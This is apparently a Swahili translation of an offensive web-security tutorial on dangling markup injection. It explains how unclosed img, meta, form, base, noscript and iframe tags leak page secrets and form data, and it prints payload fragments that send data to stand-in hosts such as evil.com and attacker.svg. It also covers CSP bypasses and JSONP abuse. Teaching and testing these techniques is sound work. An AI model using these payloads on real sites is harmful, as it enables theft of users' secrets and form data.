Dangling Markup - HTML scriptless injection
Muhtasari
Mbinu hii inaweza kutumika kutoa habari kutoka kwa mtumiaji wakati uingizaji wa HTML unapatikana. Hii ni muhimu sana ikiwa hauoni njia yoyote ya kutumia XSS lakini unaweza kuingiza vitambulisho vya HTML. Pia ni muhimu ikiwa siri imehifadhiwa kwa maandishi wazi kwenye HTML na unataka kuiondoa kutoka kwa mteja, au ikiwa unataka kudanganya utekelezaji wa skripti fulani.
Mbinu kadhaa zilizotajwa hapa zinaweza kutumika kukiuka baadhi ya Sera ya Usalama wa Yaliyomo kwa kutoa habari kwa njia zisizotarajiwa (vitambulisho vya html, CSS, vitambulisho vya http-meta, fomu, msingi...).
Matumizi Makuu
Kuiba siri za maandishi wazi
Ikiwa unainjeka <img src='http://evil.com/log.cgi?
wakati ukurasa unapakia, muathiriwa atakutumia msimbo wote kati ya vitambulisho vya img
vilivyoingizwa na nukuu inayofuata ndani ya msimbo. Ikiwa siri ipo kwenye kipande hicho, utaiba i t(unaweza kufanya kitu kama hicho kwa kutumia nukuu mara mbili, tazama ni ipi inaweza kuwa ya kuvutia zaidi kutumia).
Ikiwa vitambulisho vya img
vimezuiliwa (kutokana na CSP kwa mfano) unaweza pia kutumia <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?
Tafadhali kumbuka kwamba Chrome inazuia URL za HTTP zenye "<" au "\n" ndani yake, hivyo unaweza jaribu mbinu nyingine za itifaki kama "ftp".
Unaweza pia kutumia CSS @import
(italeta msimbo wote hadi itakapopata ";")
Unaweza pia kutumia <table
:
Unaweza pia kuweka lebo ya <base
. Taarifa zote zitatumwa hadi nukuu itakapofungwa lakini inahitaji ushirikiano wa mtumiaji (mtumiaji lazima bonyeza kiungo fulani, kwa sababu lebo ya msingi itakuwa imebadilisha kikoa kinachoelekezwa na kiungo):
Kuiba fomu
Kisha, fomu zinazotuma data kwa njia ya path (kama <form action='update_profile.php'>
) zitatuma data kwa kikoa cha madhara.
Kuiba fomu 2
Wekeza kichwa cha fomu: <form action='http://evil.com/log_steal'>
hii itabatilisha kichwa cha fomu inayofuata na data yote kutoka kwenye fomu itatumwa kwa muhusika.
Kuiba fomu 3
Kitufe kinaweza kubadilisha URL ambapo habari ya fomu itatumwa kwa kutumia sifa "formaction":
Mshambuliaji anaweza kutumia hii kuiba taarifa.
Pata mfano wa shambulio hili katika andiko hili.
Kuiba siri za maandishi wazi 2
Kwa kutumia mbinu iliyotajwa hapo juu ya kuiba fomu (kuingiza kichwa kipya cha fomu) unaweza kisha kuingiza uga mpya wa kuingiza:
Na uga huu wa kuingiza utaleta yaliyomo kati ya herufi zake mbili na herufi zingine katika HTML. Shambulio hili linachanganya "Kuiba siri za maandishi wazi" na "Kuiba fomu2".
Unaweza kufanya kitu sawa kwa kuingiza fomu na lebo ya <option>
. Data yote hadi <option>
iliyofungwa inapatikana itatumwa:
Kuingiza Parameta ya Fomu
Unaweza kubadilisha njia ya fomu na kuingiza thamani mpya ili hatua isiyotarajiwa ifanyike:
Kuiba siri za maandishi wazi kupitia noscript
<noscript></noscript>
Ni lebo ambayo yaliyomo yake yataeleweka ikiwa kivinjari hakisaidii javascript (unaweza kuwezesha/kulemaza Javascript kwenye Chrome katika chrome://settings/content/javascript).
Njia ya kuchukua yaliyomo ya ukurasa wa wavuti kutoka sehemu ya kuingiza hadi chini hadi tovuti iliyo na udhibiti wa mshambuliaji itakuwa kwa kuingiza hii:
Kupitisha CSP na ushirikiano wa mtumiaji
Kutoka kwa utafiti wa portswiggers unaweza kujifunza kwamba hata kutoka kwa mazingira yaliyopewa kizuizi cha CSP zaidi, bado unaweza kutoa data na baadhi ya ushirikiano wa mtumiaji. Katika tukio hili tutatumia mzigo wa data:
Tafadhali eleza mwathiri a bonyeza kiungo ambacho kitampeleka kwa payload inayodhibitiwa na wewe. Pia eleza kwamba lengo
sifa ndani ya tagi ya msingi
italeta maudhui ya HTML hadi alama ya kufungua ya pili. Hii itafanya thamani ya window.name
ikiwa kiungo kimebonyezwa kuwa maudhui yote ya HTML. Kwa hivyo, kwa kuwa unadhibiti ukurasa ambapo mwathiri anapata kwa kubonyeza kiungo, unaweza kupata window.name
hiyo na kuvuja data hiyo:
Mchakato wa kudanganya wa hatua ya 1 - Shambulio la nafasi ya HTML
Ingiza lebo mpya na kitambulisho ndani ya HTML ambayo itaandika juu ya ile inayofuata na na thamani itakayokuwa na athari kwenye mchakato wa script. Katika mfano huu unachagua na nani habari itashirikishwa:
Mchakato wa kudanganya wa script 2 - Shambulio la jina la script
Unda mchanganyiko wa variables ndani ya namespace ya javascript kwa kuingiza vitambulisho vya HTML. Kisha, variable hii itaathiri mtiririko wa programu:
Matumizi Mabaya ya JSONP
Ikiwa utapata kiolesura cha JSONP unaweza kuweza kuita kazi isiyo na kikomo na data isiyo na kikomo:
Au unaweza hata kujaribu kutekeleza baadhi ya javascript:
Matumizi ya Iframe
Waraka wa mtoto una uwezo wa kuona na kurekebisha mali ya location
ya mzazi wake, hata katika hali za mipaka-tofauti. Hii inaruhusu kuingiza script ndani ya iframe ambayo inaweza kuongoza mteja kwenye ukurasa usio na kikomo:
Hii inaweza kudhibitiwa kwa kitu kama: sandbox=' allow-scripts allow-top-navigation'
Iframe pia inaweza kutumika kuvuja taarifa nyeti kutoka kwenye ukurasa tofauti kwa kutumia sifa ya jina la iframe. Hii ni kwa sababu unaweza kuunda iframe ambayo inajiframisha yenyewe ikivunja HTML inayofanya taarifa nyeti ionekane ndani ya sifa ya jina la iframe na kisha kufikia jina hilo kutoka kwenye iframe ya awali na kulivuja.
Kwa maelezo zaidi angalia https://portswigger.net/research/bypassing-csp-with-dangling-iframes
<meta matumizi mabaya
Unaweza kutumia meta http-equiv
kutekeleza vitendo kadhaa kama kuweka Cookie: <meta http-equiv="Set-Cookie" Content="SESSID=1">
au kufanya upya (baada ya sekunde 5 katika kesi hii): <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />
Hii inaweza kuepukwa na CSP kuhusiana na http-equiv (Content-Security-Policy: default-src 'self';
, au Content-Security-Policy: http-equiv 'self';
)
Tag mpya ya HTML ya <portal
Unaweza kupata utafiti wa kuvutia sana kuhusu udhaifu unaoweza kutumiwa wa tag ya <portal hapa.
Wakati wa kuandika hii, unahitaji kuwezesha tag ya portal kwenye Chrome katika chrome://flags/#enable-portals
au haitafanya kazi.
Kuvuja kwa HTML
Haitakuwa njia zote za kuvuja kwa uunganisho katika HTML kuwa na manufaa kwa Dangling Markup, lakini mara kwa mara inaweza kusaidia. Angalia hapa: https://github.com/cure53/HTTPLeaks/blob/master/leak.html
SS-Kuvuja
Hii ni mchanganyiko kati ya dangling markup na XS-Kuvuja. Kwa upande mmoja, udhaifu huu huruhusu kuingiza HTML (lakini sio JS) kwenye ukurasa wa asili sawa na ile tutakayokuwa tukiishambulia. Kwa upande mwingine, hatutashambulia moja kwa moja ukurasa ambapo tunaweza kuingiza HTML, bali ukurasa mwingine.
pageSS-LeaksXS-Tafuta/XS-Kuvuja
XS-Tafuta inalenga kuvuja kwa habari kati ya asili tofauti kwa kutumia mashambulizi ya njia ya upande. Kwa hivyo, ni mbinu tofauti na Dangling Markup, hata hivyo, baadhi ya mbinu zinatumia kuingiza vitambulisho vya HTML (na bila utekelezaji wa JS), kama Kuingiza CSS au Pakia Picha kwa Uvivu.
pageXS-Search/XS-LeaksOrodha ya Kugundua Kwa Nguvu
Marejeo
Last updated